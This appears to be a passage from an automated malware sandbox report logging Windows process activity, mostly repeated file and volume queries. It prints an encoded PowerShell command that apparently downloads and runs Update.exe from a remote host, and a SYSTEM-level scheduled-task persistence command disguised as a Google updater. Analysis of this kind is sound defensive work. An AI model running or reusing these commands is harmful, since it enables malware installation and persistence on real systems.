            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "kaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackalgbeag8adwbuagwabwbhagqargbpagwazqaoaccaaab0ahqacaa6ac8alwa1adealga3adcalgaxadqamaauadcanaavahaayqbnaguacwavafuacabkageadablac4azqb4aguajwasacaapaajag0aaab0acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmazab2agcaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaegbyagiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccavqbwagqayqb0agualgblahgazqanackakqa8acmaygblaheaiwa+adsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmaeqbqagyaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbuaguabqbwacaapaajagqababuacmapgagac0aqwboagkababkafaayqb0aggaiaanafuacabkageadablac4azqb4aguajwapadwaiwbragmabgajad4a"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "kaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackalgbeag8adwbuagwabwbhagqargbpagwazqaoaccaaab0ahqacaa6ac8alwa1adealga3adcalgaxadqamaauadcanaavahaayqbnaguacwavafuacabkageadablac4azqb4aguajwasacaapaajag0aaab0acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmazab2agcaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaegbyagiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccavqbwagqayqb0agualgblahgazqanackakqa8acmaygblaheaiwa+adsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmaeqbqagyaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbuaguabqbwacaapaajagqababuacmapgagac0aqwboagkababkafaayqb0aggaiaanafuacabkageadablac4azqb4aguajwapadwaiwbragmabgajad4a"
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cmkpzahpq#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cmkpzahpq#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00421244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,19_2_00421244
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00421D45 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00421D45
            Source: MindZenithPro.pifBinary or memory string: Shell_TrayWnd
            Source: hfi47s4wOT.exe, 00000000.00000003.1619256049.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659298794.0000000003865000.00000004.00000800.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.000000000395D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E09E8 cpuid 19_2_003E09E8
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\ucrtbase.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\_bz2.pyd VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\_lzma.pyd VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography\hazmat\bindings VolumeInformation
